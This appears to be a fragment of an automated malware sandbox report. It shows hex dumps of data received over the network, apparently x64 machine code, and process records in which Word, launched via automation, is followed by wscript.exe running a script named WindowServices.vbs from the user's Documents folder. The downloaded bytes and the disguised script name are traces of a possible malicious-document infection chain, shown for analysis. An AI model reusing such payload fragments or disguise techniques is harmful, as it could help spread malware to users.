      2025-01-14 14:42:10 UTC1369INData Raw: 65 39 35 63 30 30 63 63 63 63 63 63 63 63 34 38 38 33 65 63 32 38 66 32 30 66 31 30 30 35 37 34 62 35 37 39 30 30 36 36 30 66 32 65 30 35 34 34 39 31 37 30 30 30 37 61 32 37 37 35 32 35 34 38 38 64 34 63 32 34 33 30 66 66 31 35 38 35 62 66 36 31 30 30 30 66 35 37 63 30 66 32 34 38 30 66 32 61 34 34 32 34 33 30 66 32 30 66 35 65 30 35 36 33 39 30 37 30 30 30 66 32 30 66 31 31 30 35 34 33 62 35 37 39 30 30 34 38 63 37 30 35 65 38 66 63 37 61 30 30 30 30 30 30 30 30 30 30 34 38 38 33 63 34 32 38 63 33 63 63 63 63 63 63 34 38 38 64 30 64 38 39 64 38 35 63 30 30 34 38 38 64 30 35 62 62 64 38 35 63 30 30 34 38 32 62 63 31 34 38 38 64 30 64 37 38 64 30 35 63 30 30 34 38 38 39 30 35 65 39 63 65 37 39 30 30 34 38 38 64 30 35 39 31 64 30 35 63 30 30 34 38 32 62 63
      Data Ascii: e95c00cccccccc4883ec28f20f100574b57900660f2e05449170007a277525488d4c2430ff1585bf61000f57c0f2480f2a442430f20f5e0563907000f20f110543b5790048c705e8fc7a00000000004883c428c3cccccc488d0d89d85c00488d05bbd85c00482bc1488d0d78d05c00488905e9ce7900488d0591d05c00482bc
      2025-01-14 14:42:10 UTC1369INData Raw: 38 30 39 30 39 30 39 30 39 30 36 30 31 30 31 30 63 30 39 30 63 30 63 30 37 30 37 30 37 30 37 30 37 30 63 30 63 30 63 30 63 30 63 30 37 30 63 30 37 30 63 30 37 30 63 30 37 30 63 30 37 30 63 30 37 30 39 30 63 30 61 30 61 30 61 30 61 30 61 30 62 30 62 30 61 30 61 30 61 30 61 30 61 30 61 30 61 30 62 30 62 30 61 30 61 30 62 30 62 30 39 30 63 30 63 30 63 30 39 30 63 30 63 30 31 30 39 30 63 30 63 30 62 30 62 30 62 30 62 30 31 30 63 30 63 30 63 30 31 30 63 30 63 30 32 30 33 30 31 30 30 30 61 30 61 30 61 30 61 30 63 30 62 30 63 30 61 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 63 30 31 30 63 30 38 30 38 30 38 30 38 30 38 30 63 30 63 30 39 30 39 30 39 30 63 30 39 63 63 63 63 63 63 63 63 63 63 63 63 36 35 34 38 38 62 30 34 32 35
      Data Ascii: 8090909090601010c090c0c07070707070c0c0c0c0c070c070c070c070c070c07090c0a0a0a0a0a0b0b0a0a0a0a0a0a0a0b0b0a0a0b0b090c0c0c090c0c01090c0c0b0b0b0b010c0c0c010c0c020301000a0a0a0a0c0b0c0a0c0c0c0c0c0c0c0c0c0c0c0c0c0c010c08080808080c0c0909090c09cccccccccccc65488b0425
      2025-01-14 14:42:10 UTC1369INData Raw: 38 33 63 34 32 30 35 66 63 33 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 38 30 37 39 30 61 30 30 34 63 38 62 63 32 37 34 31 38 34 38 38 62 30 32 34 38 38 64 39 31 35 30 30 31 30 30 30 30 34 39 38 62 63 38 34 38 38 62 34 30 31 38 34 38 66 66 32 35 66 37 63 37 36 31 30 30 63 33 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 63 34 38 38 39 34 63 32 34 30 38 35 33 34 38 38 33 65 63 33 30 34 38 38 62 64 39 38 30 37 39 30 61 30 30 37 34 32 30 34 63 38 62 30 31 34 38 63 37 34 34 32 34 32 30 30 30 30 30 30 30 30 30 34 63 38 62 38 39 36 38 30 31 30 30 30 30 34 35 38 62 30 30 30 66 62 37 35 31 30 38 65 38 35 65 64 32 33 30 30 30 39 30 34 38 38 64 38 33 35 30 30 31 30 30 30 30 34 38 38 39 34 34 32 34 34 38 66 36 34 30 30
      Data Ascii: 83c4205fc3cccccccccccccccccc80790a004c8bc27418488b02488d9150010000498bc8488b401848ff25f7c76100c3cccccccccccccccccccccccccccc48894c2408534883ec30488bd980790a0074204c8b0148c7442420000000004c8b8968010000458b000fb75108e85ed2300090488d83500100004889442448f6400
      2025-01-14 14:42:10 UTC1369INData Raw: 38 31 30 34 38 36 33 63 31 34 38 38 64 30 63 63 35 30 30 30 30 30 30 30 30 34 64 38 39 33 34 30 62 34 39 38 62 37 30 32 30 34 38 30 33 66 31 37 34 63 34 66 66 34 66 32 30 65 39 33 61 30 31 30 30 30 30 34 31 38 62 63 65 38 62 35 37 31 30 38 64 30 34 31 32 62 65 66 63 33 66 30 30 30 30 33 62 63 36 30 66 34 32 66 30 34 34 33 62 65 39 30 66 38 36 30 62 30 31 30 30 30 30 34 31 38 62 65 64 34 31 33 62 64 35 30 66 34 37 65 61 34 35 38 35 66 66 37 34 31 30 34 39 38 62 63 63 65 38 31 65 63 65 30 33 30 30 34 35 38 62 66 65 34 34 38 39 37 34 32 34 33 38 63 37 34 34 32 34 32 38 30 36 30 30 30 30 30 30 34 34 38 39 37 34 32 34 32 30 34 35 33 33 63 39 34 31 62 38 31 64 30 30 30 30 30 30 34 38 38 62 31 35 63 39 33 61 37 61 30 30 34 38 38 64 34 63 32 34 37 30 65 38 62 66
      Data Ascii: 8104863c1488d0cc5000000004d89340b498b70204803f174c4ff4f20e93a010000418bce8b57108d0412befc3f00003bc60f42f0443be90f860b010000418bed413bd50f47ea4585ff7410498bcce81ece0300458bfe4489742438c74424280600000044897424204533c941b81d000000488b15c93a7a00488d4c2470e8bf
      2025-01-14 14:42:10 UTC1369INData Raw: 39 30 34 38 38 64 38 62 33 30 30 33 30 30 30 30 65 38 35 38 63 65 30 30 30 30 39 30 34 38 38 64 38 62 64 38 30 33 30 30 30 30 65 38 34 62 63 65 30 30 30 30 39 30 34 38 38 64 38 33 38 38 30 34 30 30 30 30 34 38 38 39 34 34 32 34 33 38 34 38 38 39 33 38 34 38 38 39 37 38 30 38 34 38 38 39 37 38 31 30 34 38 38 39 37 38 31 38 34 38 38 39 37 38 32 30 34 38 38 39 37 38 32 38 34 38 38 39 62 62 36 38 30 32 30 30 30 30 34 38 38 39 62 62 37 38 30 32 30 30 30 30 34 38 38 62 30 64 34 32 33 33 37 61 30 30 34 38 38 62 30 31 34 38 38 62 34 30 31 30 66 66 31 35 36 64 63 32 36 31 30 30 34 38 38 39 38 33 37 30 30 32 30 30 30 30 34 38 38 39 62 62 38 30 30 32 30 30 30 30 30 66 35 37 63 30 30 66 31 31 34 33 30 38 30 66 31 31 34 33 31 38 30 66 31 31 34 33 32 38 30 66 31 31 34
      Data Ascii: 90488d8b30030000e858ce000090488d8bd8030000e84bce000090488d8388040000488944243848893848897808488978104889781848897820488978284889bb680200004889bb78020000488b0d42337a00488b01488b4010ff156dc26100488983700200004889bb800200000f57c00f1143080f1143180f1143280f114
      2025-01-14 14:42:10 UTC1369INData Raw: 30 30 30 30 66 35 37 63 30 30 66 31 31 30 33 30 66 31 31 34 33 31 30 30 66 31 31 34 33 32 30 30 66 31 31 34 33 33 30 38 31 34 62 32 38 30 30 30 30 30 30 34 30 34 38 38 62 63 62 66 66 31 35 62 64 62 36 36 31 30 30 38 62 34 33 32 38 32 35 30 31 30 30 30 30 63 30 30 64 30 31 30 30 30 30 38 30 38 39 34 33 32 38 63 37 34 33 33 30 30 31 30 30 30 30 30 30 63 37 34 33 33 34 30 31 30 30 30 30 30 30 38 31 38 66 30 30 30 31 30 30 30 30 30 30 30 30 30 30 34 30 34 38 38 64 38 66 64 38 30 30 30 30 30 30 66 66 31 35 38 38 62 36 36 31 30 30 38 62 38 37 30 30 30 31 30 30 30 30 32 35 30 30 30 30 30 30 63 30 30 66 62 61 65 38 31 66 38 39 38 37 30 30 30 31 30 30 30 30 38 31 38 66 33 30 30 31 30 30 30 30 30 30 30 30 30 30 34 30 34 38 38 64 38 66 30 38 30 31 30 30 30 30 66 66
      Data Ascii: 0000f57c00f11030f1143100f1143200f114330814b2800000040488bcbff15bdb661008b432825010000c00d01000080894328c7433001000000c7433401000000818f0001000000000040488d8fd8000000ff1588b661008b870001000025000000c00fbae81f898700010000818f3001000000000040488d8f08010000ff


      Click to jump to process

      Click to jump to process

      Click to dive into process behavior distribution

      Click to jump to process

      Target ID:0
      Start time:09:41:59
      Start date:14/01/2025
      Path:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
      Wow64 process (32bit):true
      Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
      Imagebase:0x4c0000
      File size:1'620'872 bytes
      MD5 hash:1A0C2C2E7D9C4BC18E91604E9B0C7678
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:false

      Target ID:4
      Start time:09:42:07
      Start date:14/01/2025
      Path:C:\Windows\SysWOW64\wscript.exe
      Wow64 process (32bit):true
      Commandline:C:\Windows\SysWOW64\wscript.exe "C:\Users\user\Documents\WindowServices.vbs"
      Imagebase:0xf90000
      File size:147'456 bytes
      MD5 hash:FF00E0480075B095948000BDC66E81F0
      Has elevated privileges:true
      Has administrator privileges:true
      Programmed in:C, C++ or other language
      Reputation:high
      Has exited:true

      No disassembly